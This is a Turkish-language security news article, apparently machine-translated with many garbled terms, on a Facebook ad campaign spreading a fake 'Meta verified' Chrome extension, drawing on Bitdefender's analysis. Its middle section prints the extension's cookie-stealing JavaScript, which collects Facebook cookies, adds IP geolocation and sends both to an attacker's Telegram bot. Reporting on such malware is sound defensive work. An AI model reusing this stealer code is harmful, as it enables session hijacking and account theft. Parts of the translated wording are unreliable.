Kötü niyetli aktörler, Facebook’ta şüphesiz kullanıcıları sahte bir “meta doğrulanmış” tarayıcı uzantısı yüklemeye zorlayan sofistike bir kötü niyetli kampanyası başlattı.
Görünüşte meşru video öğreticileri aracılığıyla tanıtılan bu reklamlar, Meta’nın abonelik ücretini ödemeden açgözlü mavi doğrulama kenesinin kilidini açmayı vaat ediyor.
Gerçekte, uzantı oturum çerezleri, erişim belirteçleri ve IP adresleri dahil olmak üzere hassas kullanıcı verilerini hasat etmek üzere tasarlanmıştır.
Barındırma için Box.com gibi güvenilir platformlardan yararlanarak, saldırganlar yüksek kullanılabilirlik sağlar ve basit URL engelleme savunmalarından kaçar, bu da aldatmaca hem otantik hem de risksiz görünür.
Daha yakından incelendiğinde, reklamlara eşlik eden video öğreticileri Vietnamca konuşan tehdit aktörlerinin parmak izlerini taşıyor ve Vietnamca’da yazılmış anlatım ve kod yorumları.
Uzantının kodu, beceriksizce gizlenmiş ve muhtemelen AI destekli bir araç seti tarafından üretilmesine rağmen, hala verileri etkili bir şekilde söndürür.
Bitdefender analistleri, geçerli erişim jetonları elde edildikten sonra iş hesabı bilgilerini sorgulamak için Facebook Grafik API’sının kullanımını belirledi ve saldırganların yüksek değerli kurumsal profilleri kişisel hesaplardan ayırmasına izin verdi.
.webp)
Öğreticiyi takip eden kurbanlar farkında olmadan, Facebook.com alanından çerezleri okumak ve dışa aktarmak için uzantı izinleri verir.
Yüklendikten sonra, uzantı hemen saldırganlar tarafından kontrol edilen bir telgraf botuna iletmeden önce her çerezi biçimlendirilmiş bir dizeye derleyen bir ExportCookies işlevini çağırır.
.webp)
Çalıntı verileri daha da kişiselleştirmek için, kötü amaçlı yazılım, coğrafi konum ayrıntılarını eklemek için https://ipinfo.io/json sorgular ve pazarlanabilirliğini yeraltı forumlarında artırır.
Bitdefender araştırmacıları, bu uzantının varyantlarının kene boyutu ve konumu için ayarlanabilir parametreler içerdiğini ve minimum manuel çabaya sahip yeni kampanya varlıkları oluşturmak için otomatik bir boru hattı olduğunu belirtti.
Modüler tasarım ayrıca, krom başlangıçta otomatik yürütmeyi destekler ve kullanıcılar uzantıyı devre dışı bıraksa ve yeniden etkinleştirse bile kalıcı veri hasatını sağlar.
Enfeksiyon mekanizması derin dalış
Enfeksiyon mekanizmasının çekirdeği, kullanıcı istemlerini tetiklemeden oturum belirteçlerini çıkarmak için Chrome’un Çerez API’sına bağlanan kötü niyetli uzantının arka plan komut dosyasında yatmaktadır.
Kurulumdan sonra – bir reklam bağlantısına tıklayarak tetiklenir – uzantı kullanır chrome.cookies.getAll({ domain: "facebook.com" }, callback) Çerez toplamak için.
Geri arama içinde, yükü oluşturur:-
async function exportCookies() {
chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
const cookieString = cookies. Map(c => `${c.name}=${c.value}`).join(";");
const userId = cookies. Find(c => c.name === "c_user")?.value || "Unknown";
const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}Bu aerodinamik yaklaşım, birçok uç nokta tabanlı tespiti atarken, barındırma ve komut ve kontrol için meşru alanların kullanılması hızlı yayılma olasılığını azaltır.
Güvenlik ekipleri, anormal çerez ihracat faaliyetini izlemeli ve bu tür sanayileşmiş kötüverizasyon tehditlerine karşı savunmak için titiz uzatma veterinerini uygulamalıdır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.